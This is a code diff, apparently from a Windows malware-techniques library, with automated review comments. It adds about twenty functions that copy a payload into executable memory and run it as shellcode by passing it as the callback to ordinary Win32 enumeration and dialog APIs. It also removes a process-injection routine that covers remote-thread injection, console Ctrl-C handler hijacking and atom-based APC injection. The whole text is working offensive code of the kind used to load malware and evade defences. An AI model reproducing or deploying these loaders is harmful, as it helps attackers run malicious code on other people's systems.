EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDirTreeWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDisplayMonitorsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDisplayMonitors(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDisplayMonitorsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumFontFamiliesExWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumFontFamiliesExW(GetDC(NULL), &Font, (FONTENUMPROCW)lpParameter, NULL, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumFontFamiliesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumFontFamiliesExWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
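Review bot: `GetDC(NULL)` in `InvokeEnumFontFamiliesExWThreadCallbackRoutine` acquires a screen DC that is never released, so each call leaks a GDI handle; keep it in a local (`HDC hDC = GetDC(NULL);`) and call `ReleaseDC(NULL, hDC);` after `EnumFontFamiliesExW` returns. The `InvokeEnumFontsWThreadCallbackRoutine` and `InvokeEnumObjectsThreadCallbackRoutine` sections below have the same unreleased `GetDC(NULL)`.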
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumFontsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumFontsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumFontsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumLanguageGroupLocalesWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)lpParameter, LGRPID_ARABIC, 0, 0);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumLanguageGroupLocalesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumLanguageGroupLocalesWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumObjectsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumObjects(GetDC(NULL), OBJ_BRUSH, (GOBJENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumObjects(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumObjectsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
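Review bot: `LOGFONTW Font` in `InvokeEnumObjectsThreadCallbackRoutine` is initialised and has `lfCharSet` set but is never passed to `EnumObjects`, so the two lines are dead code carried over from the `EnumFontFamiliesExW` variant; remove `LOGFONTW Font = { 0 };` and `Font.lfCharSet = DEFAULT_CHARSET;`.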
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumPwrSchemesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumPwrSchemes((PWRSCHEMESENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumPwrSchemesCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumResourceTypesExWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumResourceTypesExW(NULL, (ENUMRESTYPEPROCW)lpParameter, NULL, RESOURCE_ENUM_VALIDATE, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumResourceTypesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumResourceTypesExWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemCodePagesWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)lpParameter, CP_INSTALLED);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemCodePagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemCodePagesWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemGeoIDThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemGeoID(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemGeoIDThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemLanguageGroupsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)lpParameter, LGRPID_SUPPORTED, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemLanguageGroupsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemLanguageGroupsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumSystemLocalesExThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumSystemLocalesEx((LOCALE_ENUMPROCEX)lpParameter, LOCALE_ALL, NULL, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumSystemLocalesEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemLocalesExThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumThreadWindowsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumThreadWindows(0, (WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumThreadWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumThreadWindowsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumTimeFormatsExCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)lpParameter, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumTimeFormatsEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumTimeFormatsExCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumUILanguagesWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumUILanguagesW((UILANGUAGE_ENUMPROCW)lpParameter, MUI_LANGUAGE_ID, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumUILanguagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumUILanguagesWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumWindowStationsWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumWindowStationsW((WINSTAENUMPROCW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumWindowStationsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumWindowStationsWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumWindowsCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumWindows((WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumWindowsCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumerateLoadedModules64CallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumerateLoadedModules64CallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeK32EnumPageFilesWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
K32EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeK32EnumPageFilesWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeMessageBoxIndirectWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
MSGBOXPARAMS MessageBoxParams = { 0 };
|
||||
MessageBoxParams.cbSize = sizeof(MSGBOXPARAMS);
|
||||
MessageBoxParams.dwStyle = MB_HELP;
|
||||
MessageBoxParams.lpfnMsgBoxCallback = (MSGBOXCALLBACK)lpParameter;
|
||||
MessageBoxParams.lpszText = L"";
|
||||
|
||||
MessageBoxIndirectW(&MessageBoxParams);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeMessageBoxIndirectWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
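Review bot: InvokeMessageBoxIndirectWCallbackRoutine carries no comment on when lpfnMsgBoxCallback actually runs, and the `[Unstable]` marker that the deleted E_MESSAGEBOXINDIRECT case kept in lpszText is dropped here in favour of `L""`. As far as I recall, MessageBoxIndirectW invokes lpfnMsgBoxCallback only on a help request (MB_HELP: F1 or the Help button) and returns only once the dialog is dismissed, so the INFINITE wait in MpfSceViaMessageBoxIndirectW blocks on user interaction; that is worth stating in a header comment such as `// Blocks until the dialog is dismissed; lpfnMsgBoxCallback fires only on the MB_HELP help event.`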
|
|
@ -1,215 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii)
|
||||
{
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
HANDLE hThread = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
switch (Pii->MethodEnum)
|
||||
{
|
||||
case E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE:
|
||||
{
|
||||
hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pii->ProcessId);
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
if (!SetProcessPrivilegeToken(0))
|
||||
break;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
|
||||
break;
|
||||
|
||||
hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
|
||||
if (hThread == NULL)
|
||||
break;
|
||||
|
||||
WaitForSingleObject(hThread, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CTRL_INJECT: //console applications only
|
||||
{
|
||||
DWORD ConsoleAttachList[2] = { 0 };
|
||||
DWORD ParentId = 0;
|
||||
PVOID EncodedAddress = NULL;
|
||||
INPUT Input = { 0 };
|
||||
MODULEINFO KernelbaseInformation = { 0 };
|
||||
HWND hWindow = NULL;
|
||||
HMODULE KernelBase = NULL, hModule = NULL;
|
||||
RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
|
||||
DWORD64 Encoded = 0;
|
||||
|
||||
PCHAR KernelBaseDefaultHandler = NULL;
|
||||
PCHAR KernelBaseSingleHandler = NULL;
|
||||
|
||||
KernelBase = GetModuleHandleEx2W(L"kernelbase.dll");
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
|
||||
if (!KernelBase || !hModule)
|
||||
break;
|
||||
|
||||
RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hModule, "RtlEncodeRemotePointer");
|
||||
if (RtlEncodeRemotePointer == NULL)
|
||||
break;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, KernelBase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
break;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
if (KernelBaseDefaultHandler == NULL)
|
||||
break;
|
||||
|
||||
Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
|
||||
if (Encoded == 0)
|
||||
break;
|
||||
|
||||
KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
|
||||
if (KernelBaseSingleHandler == NULL)
|
||||
break;
|
||||
|
||||
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
|
||||
break;
|
||||
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
|
||||
ParentId = ConsoleAttachList[0];
|
||||
else
|
||||
ParentId = ConsoleAttachList[1];
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(Pii->ProcessId);
|
||||
|
||||
hWindow = GetConsoleWindow();
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(ParentId);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId);
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
|
||||
break;
|
||||
|
||||
CloseHandle(hHandle);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
break;
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = 0; // 0 for key press
|
||||
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
Sleep(100);
|
||||
|
||||
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
|
||||
|
||||
Sleep(100);
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = KEYEVENTF_KEYUP;
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
|
||||
WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL);
|
||||
|
||||
bFlag = TRUE;
|
||||
break;
|
||||
}
|
||||
|
||||
case E_QUEUE_USER_APC: //must use EBFB variant
|
||||
{
|
||||
NTQUEUEAPCTHREAD NtQueueApcThread = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;
|
||||
PCHAR pPayload = (PCHAR)Pii->Payload;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
break;
|
||||
|
||||
NtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddressA((DWORD64)hModule, "NtQueueApcThread");
|
||||
if (!NtQueueApcThread)
|
||||
break;
|
||||
|
||||
hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_INFORMATION, FALSE, Pii->ThreadId);
|
||||
if (hThread == NULL)
|
||||
break;
|
||||
|
||||
hHandle = OpenProcess(0x001fffff, FALSE, GetProcessIdOfThread(hThread));
|
||||
if (hHandle == NULL)
|
||||
break;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, 0x00003000, 0x00000040);
|
||||
if (BaseAddress == NULL)
|
||||
break;
|
||||
|
||||
Bravo = GlobalAddAtomA("b");
|
||||
if (Bravo == 0)
|
||||
break;
|
||||
|
||||
if (pPayload[0] == '\0')
|
||||
break;
|
||||
|
||||
for (DWORD64 Position = Pii->dwLengthOfPayloadInBytes - 1; Position > 0; Position--)
|
||||
{
|
||||
if ((pPayload[Position] == '\0') && (pPayload[Position - 1] == '\0'))
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Bravo, (PVOID)(((DWORD64)BaseAddress) + Position - 1), (PVOID)2);
|
||||
}
|
||||
|
||||
for (PCHAR Position = pPayload; Position < (pPayload + Pii->dwLengthOfPayloadInBytes); Position += strlen(Position) + 1)
|
||||
{
|
||||
if (*Position == '\0')
|
||||
continue;
|
||||
|
||||
Alpha = GlobalAddAtomA(Position);
|
||||
if (Alpha == 0)
|
||||
break;
|
||||
|
||||
